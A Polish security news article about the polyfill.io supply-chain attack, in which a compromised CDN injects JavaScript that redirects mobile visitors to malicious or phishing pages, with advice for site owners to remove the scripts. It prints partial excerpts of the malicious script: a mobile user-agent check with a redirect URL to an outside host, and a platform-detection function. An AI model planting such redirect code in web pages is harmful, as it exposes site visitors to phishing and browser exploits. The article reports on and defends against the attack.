Złośliwy kod w skryptach Polyfill[.]io

Przeszło 100 tysięcy serwisów, używających kodu od polyfill[.]io z dużym prawdopodobieństwem może infekować odwiedzających złośliwych oprogramowaniem! Jeśli wśród tych witryn jest Twoja – niezwłocznie usuń feralny kod!

Polyfill to przydatny kawałek kodu JavaScript, dodający do starych przeglądarek możliwość korzystania z funkcjonalności wbudowanych w nowe. W skrócie – korzystając z polyfills, sprawiasz, że kod na Twojej witrynie zadziała u większej liczby odwiedzających ją użytkowników. Informacje zaprezentowane przez badaczy dowodzą, że istotną grupą narażoną na ryzyko są użytkownicy przeglądarek mobilnych.

We wtorek 26 czerwca grupa badaczy zauważyła, iż strona cdn.polyfill[.]io używana jest jako element ataku na łańcuch dostaw (supply chain attack). W efekcie zamiast służyć za lokalizację dla skryptów, wspomagających funkcjonowanie stron, wstrzykuje złośliwy kod do skryptów na witrynach klientów.

Co może się stać? Ofiary, wchodzące na zainfekowane strony, mogą np. zostać nieoczekiwanie przekierowane na złośliwe strony. Docelowe podstawione witryny mogą wykorzystywać podatności przeglądarek, bądź prezentować użytkownikom strony phishingowe.

Co ciekawe, założyciel serwisu polyfill.io, Andrew Betts już w lutym przekonywał użytkowników do usunięcia jego kodu ze swoich stron. Jego serwis został wtedy sprzedany chińskiemu operatorowi Funull.

Jeśli jesteś właścicielem witryny i uruchamiasz na niej zewnętrzne skrypty, warunkiem powinno być wyjątkowe zaufanie do dostawcy

przekonywał Betts.

A przede wszystkim przeskanowanie kodu zanim uruchomimy go u siebie.

Co robi złośliwy skrypt?

Badacze z Sansec Forensics Team zaprezentowali przykładowy skrypt. To przytaczany na wstępie kod, przygotowany specyficznie pod przeglądarki mobilne.

function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();

Inny element skryptu natomiast sprawdza z jakiego komputera i systemu operacyjnego korzysta ofiara.

function isPc() {
try {
var _isWin =
navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac =
navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
if (_isMac || _isWin) {
return true;
} else {
return false;
}
} catch (_0x44e1f6) {
return false;
}
}

Co robić?

Jeśli jesteś zwykłym internautą – z tym problemem nie zrobisz niestety nic. Jeśli jesteś adminem/developerem – upewnij się, że Twoja strona nie korzysta ze skryptów polyfill. W przypadku gdyby korzystała – oczywiście czym prędzej je usuń.